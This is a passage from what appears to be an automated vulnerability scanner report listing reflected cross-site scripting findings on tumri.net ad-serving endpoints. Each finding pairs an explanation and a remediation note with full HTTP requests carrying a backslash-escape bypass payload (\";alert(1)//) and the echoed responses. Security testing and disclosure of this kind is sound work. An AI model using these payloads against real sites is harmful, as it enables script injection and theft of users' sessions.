GET /ads/mti/6565?sc=y&DFA_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Fb4%2F%252a%2Fw%253B238933302%253B7-0%253B0%253B61840000%253B4307-300%2F250%253B41496877%2F41514664%2F1%253Bu%253D17474528%253B%257Efdr%253D234368221%253B0-0%253B0%253B58255351%253B4307-300%2F250%253B41422311%2F41440098%2F1%253Bu%253D17474528%253B%257Esscs%253D%253fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=4149687739856\"%3balert(1)//82fc139c735&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=10 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=618EFA7C34241D6799FE4011670CC9C0; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 02:10:51 GMT
Expires: Tue Jun 28 02:10:51 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 02:10:51 GMT; Path=/
Content-Length: 16214
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
LSTATE","ExperienceID":"4629","ExperienceName":"300x250_Myth_Q1","PublisherID":"ALLSTATE","ExternalBuyID":"5366545","ExternalPageID":"61840000","ExternalAdID":"238933302","ExternalCreativeID":"4149687739856\\";alert(1)//82fc139c735","ExternalSiteID":"1073076","CA4":"1","CA3":"0","CA2":"0","CA1":"0","DG1":"05672","DG2":"523","DG3":"stowe","DG4":"vt","DG5":"usa","DG6":"802","TimeZone":"US/Eastern","UserBucket":"80","TumriMiniTag":
...[SNIP]...

1.380. http://www.tumri.net/ads/mti/6565 [DFA_PlacementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6565

Issue detail

The value of the DFA_PlacementId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27d1c\"%3balert(1)//effc5c5983b was submitted in the DFA_PlacementId parameter. This input was echoed as 27d1c\\";alert(1)//effc5c5983b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6565?sc=y&DFA_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Fb4%2F%252a%2Fw%253B238933302%253B7-0%253B0%253B61840000%253B4307-300%2F250%253B41496877%2F41514664%2F1%253Bu%253D17474528%253B%257Efdr%253D234368221%253B0-0%253B0%253B58255351%253B4307-300%2F250%253B41422311%2F41440098%2F1%253Bu%253D17474528%253B%257Esscs%253D%253fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=6184000027d1c\"%3balert(1)//effc5c5983b&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=10 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=618EFA7C34241D6799FE4011670CC9C0; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 02:09:38 GMT
Expires: Tue Jun 28 02:09:39 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 02:09:39 GMT; Path=/
Content-Length: 16202
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
llState_Myth_MR","AdvertiserID":"3049","AdvertiserName":"ALLSTATE","ExperienceID":"4629","ExperienceName":"300x250_Myth_Q1","PublisherID":"ALLSTATE","ExternalBuyID":"5366545","ExternalPageID":"6184000027d1c\\";alert(1)//effc5c5983b","ExternalAdID":"238933302","ExternalCreativeID":"41496877","ExternalSiteID":"1073076","CA4":"0","CA3":"0","CA2":"0","CA1":"2","DG1":"05672","DG2":"523","DG3":"stowe","DG4":"vt","DG5":"usa","DG6":"802
...[SNIP]...

1.381. http://www.tumri.net/ads/mti/6565 [DFA_SiteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6565

Issue detail

The value of the DFA_SiteId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23f46\"%3balert(1)//f88f744b1aa was submitted in the DFA_SiteId parameter. This input was echoed as 23f46\\";alert(1)//f88f744b1aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6565?sc=y&DFA_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Fb4%2F%252a%2Fw%253B238933302%253B7-0%253B0%253B61840000%253B4307-300%2F250%253B41496877%2F41514664%2F1%253Bu%253D17474528%253B%257Efdr%253D234368221%253B0-0%253B0%253B58255351%253B4307-300%2F250%253B41422311%2F41440098%2F1%253Bu%253D17474528%253B%257Esscs%253D%253fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=107307623f46\"%3balert(1)//f88f744b1aa&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=10 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=618EFA7C34241D6799FE4011670CC9C0; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 02:11:21 GMT
Expires: Tue Jun 28 02:11:21 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 02:11:21 GMT; Path=/
Content-Length: 16215
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
9","ExperienceName":"300x250_Myth_Q1","PublisherID":"ALLSTATE","ExternalBuyID":"5366545","ExternalPageID":"61840000","ExternalAdID":"238933302","ExternalCreativeID":"41496877","ExternalSiteID":"107307623f46\\";alert(1)//f88f744b1aa","CA4":"1","CA3":"0","CA2":"0","CA1":"2","DG1":"05672","DG2":"523","DG3":"stowe","DG4":"vt","DG5":"usa","DG6":"802","TimeZone":"US/Eastern","UserBucket":"80","TumriMiniTag":"true","ProductsTheme":"All
...[SNIP]...

1.382. http://www.tumri.net/ads/mti/6565 [sc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6565

Issue detail

The value of the sc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0ded\"%3balert(1)//3761530edfb was submitted in the sc parameter. This input was echoed as b0ded\\";alert(1)//3761530edfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6565?sc=yb0ded\"%3balert(1)//3761530edfb&DFA_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Fb4%2F%252a%2Fw%253B238933302%253B7-0%253B0%253B61840000%253B4307-300%2F250%253B41496877%2F41514664%2F1%253Bu%253D17474528%253B%257Efdr%253D234368221%253B0-0%253B0%253B58255351%253B4307-300%2F250%253B41422311%2F41440098%2F1%253Bu%253D17474528%253B%257Esscs%253D%253fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=10 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=618EFA7C34241D6799FE4011670CC9C0; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 02:08:06 GMT
Expires: Tue Jun 28 02:08:07 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 02:08:07 GMT; Path=/
Content-Length: 16221
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
6&_pn=17474528&redirect=^(lp_url)","Provider":"ALLSTATE","MerchantID":"ALLSTATE","x2_tracking_code_1":"quote=PQ&cid=BAC-Xplus1&att=61840000;41496877&TFN=8664972899&Campaign=222230000010575","source":"yb0ded\\";alert(1)//3761530edfb","PublisherID":"ALLSTATE"};
   var alsParams={"PublisherId":"ALLSTATE"};
   var baseParams={"AdType":"mediumrectangle","RecipeID":"19881403879426","RecipeName":"4629: 02-00-01-01","CampaignID":"3769","Cam
...[SNIP]...

1.383. http://www.tumri.net/ads/mti/6565 [x2_TC_1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6565

Issue detail

The value of the x2_TC_1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa670\"%3balert(1)//276738062cf was submitted in the x2_TC_1 parameter. This input was echoed as fa670\\";alert(1)//276738062cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6565?sc=y&DFA_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Fb4%2F%252a%2Fw%253B238933302%253B7-0%253B0%253B61840000%253B4307-300%2F250%253B41496877%2F41514664%2F1%253Bu%253D17474528%253B%257Efdr%253D234368221%253B0-0%253B0%253B58255351%253B4307-300%2F250%253B41422311%2F41440098%2F1%253Bu%253D17474528%253B%257Esscs%253D%253fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575fa670\"%3balert(1)//276738062cf&nf=10 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=c2cbda5b-233f-4d07-8070-46c870ce62cc&_o=15719&_eo=97956&_et=1309226829&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=7235289?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=618EFA7C34241D6799FE4011670CC9C0; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 02:13:27 GMT
Expires: Tue Jun 28 02:13:27 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 02:13:27 GMT; Path=/
Content-Length: 16208
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
0509&_pm=97956&_pn=17474528&redirect=^(lp_url)","Provider":"ALLSTATE","MerchantID":"ALLSTATE","x2_tracking_code_1":"quote=PQ&cid=BAC-Xplus1&att=61840000;41496877&TFN=8664972899&Campaign=222230000010575fa670\\";alert(1)//276738062cf","source":"y","PublisherID":"ALLSTATE"};
   var alsParams={"PublisherId":"ALLSTATE"};
   var baseParams={"AdType":"mediumrectangle","RecipeID":"19881403875328","RecipeName":"4629: 00-00-00-01","CampaignID
...[SNIP]...

1.384. http://www.tumri.net/ads/mti/6928 [ATL_AdId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6928

Issue detail

The value of the ATL_AdId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41722\"%3balert(1)//afb7c7fe2d8 was submitted in the ATL_AdId parameter. This input was echoed as 41722\\";alert(1)//afb7c7fe2d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/mti/6928?ATL_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F311947907%2Fdirect%3Bai.225134941%3Bct.1%2F01%3Fhref%3D&ATL_CampaignId=direct&ATL_PlacementId=311947907&ATL_AdId=22513494141722\"%3balert(1)//afb7c7fe2d8&nf=10&loc=http%3A%2F%2Fview.atdmt.com%2FMGM%2Fiview%2F311947907%2Fdirect%2F01%2F539533%3Fclick%3Dhttp%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253D HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://www.tumri.net/ads/mti/6928?ATL_Click_Tracker=||http://ad.doubleclick.net/click%3Bh%3Dv8/3b34/f/eb/%2a/z%3B238891755%3B1-0%3B0%3B60250584%3B4307-300/250%3B41657951/41675738/1%3Bu%3D17308911%3B%7Esscs%3D%3fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D7ec0beaf-4cf3-449c-b17a-57792b122e66%26_o%3D17161829%26_eo%3D97956%26_et%3D1309224169%26_a%3D17210724%26_s%3D11683%26_d%3D17282798%26_c%3D17161854%26_pm%3D97956%26_pn%3D17308911%26redirect%3Dhttp://clk.atdmt.com/go/311947907/direct;ai.225134941;ct.1/01?href=||&ATL_CampaignId=direct&ATL_PlacementId=311947907&ATL_AdId=225134941
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-327218980|1605718887; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 01:24:35 GMT
Expires: Tue Jun 28 01:24:35 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 01:24:35 GMT; Path=/
Content-Length: 20179
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
serID":"3158","AdvertiserName":"MGMGRAND","ExperienceID":"4845","ExperienceName":"300x250_Bliss","PublisherID":"MGMGRAND","ExternalBuyID":"direct","ExternalPageID":"311947907","ExternalAdID":"22513494141722\\";alert(1)//afb7c7fe2d8","ExternalSiteID":"direct","CA1":"4","DG1":"05672","DG2":"523","DG3":"stowe","DG4":"vt","DG5":"usa","DG6":"802","TimeZone":"US/Eastern","UserBucket":"80","TumriMiniTag":"true","ProductsTheme":"300x250
...[SNIP]...

1.385. http://www.tumri.net/ads/mti/6928 [ATL_CampaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6928

Issue detail

The value of the ATL_CampaignId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad034\"%3balert(1)//6d4d1fce561 was submitted in the ATL_CampaignId parameter. This input was echoed as ad034\\";alert(1)//6d4d1fce561 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

